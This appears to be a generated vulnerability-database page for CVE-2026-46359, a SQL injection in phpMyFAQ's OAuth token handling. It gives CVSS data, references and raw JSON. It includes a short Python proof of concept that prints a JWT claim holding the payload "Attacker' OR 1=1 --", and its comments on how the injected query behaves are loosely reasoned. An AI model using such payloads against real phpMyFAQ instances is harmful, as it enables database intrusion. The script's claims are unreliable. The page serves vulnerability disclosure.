Security Vulnerability Report
CVE-2026-46359 CVSS 7.5 HIGH

CVE-2026-46359

Published: 2026-05-15 19:17:03
Last Modified: 2026-05-15 22:16:56

Description

phpMyFAQ before 4.1.2 contains a SQL injection vulnerability in CurrentUser::setTokenData that allows authenticated attackers to execute arbitrary SQL by injecting malicious OAuth token claims. Attackers with Azure AD accounts containing SQL metacharacters in display names or JWT claims can break out of string literals and execute arbitrary database queries.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

# Proof of Concept for CVE-2026-46359
# This script demonstrates the creation of a malicious JWT token claim.
# An attacker would register an Azure AD account with a display name
# containing SQL injection payloads.

# The payload attempts to bypass the string literal in the SQL query
# Example: UPDATE users SET display_name = '<PAYLOAD>' ...

# Malicious payload to break out and comment out the rest
sql_injection_payload = "Attacker' OR 1=1 --"

# Simulated JWT payload structure that would come from the OAuth provider
malicious_token_payload = {
    "sub": "001",
    "unique_name": sql_injection_payload,
    "email": "[email protected]",
    "ver": "2.0"
}

print("Malicious JWT Claim Payload:")
print(json.dumps(malicious_token_payload, indent=2))

# When phpMyFAQ < 4.1.2 processes this token in CurrentUser::setTokenData,
# it may construct a query like:
# INSERT INTO user_data (display_name) VALUES ('Attacker' OR 1=1 --')
# This results in arbitrary SQL execution.
```

References

https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7
https://www.vulncheck.com/advisories/phpmyfaq-sql-injection-in-currentuser-settokendata-via-unescaped-oauth-token-fields

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-46359",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T19:17:03.120",
    "lastModified": "2026-05-15T22:16:56.433",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "phpMyFAQ before 4.1.2 contains a sql injection vulnerability in CurrentUser::setTokenData that allows authenticated attackers to execute arbitrary SQL by injecting malicious OAuth token claims. Attackers with Azure AD accounts containing SQL metacharacters in display names or JWT claims can break out of string literals and execute arbitrary database queries."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/phpmyfaq-sql-injection-in-currentuser-settokendata-via-unescaped-oauth-token-fields",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```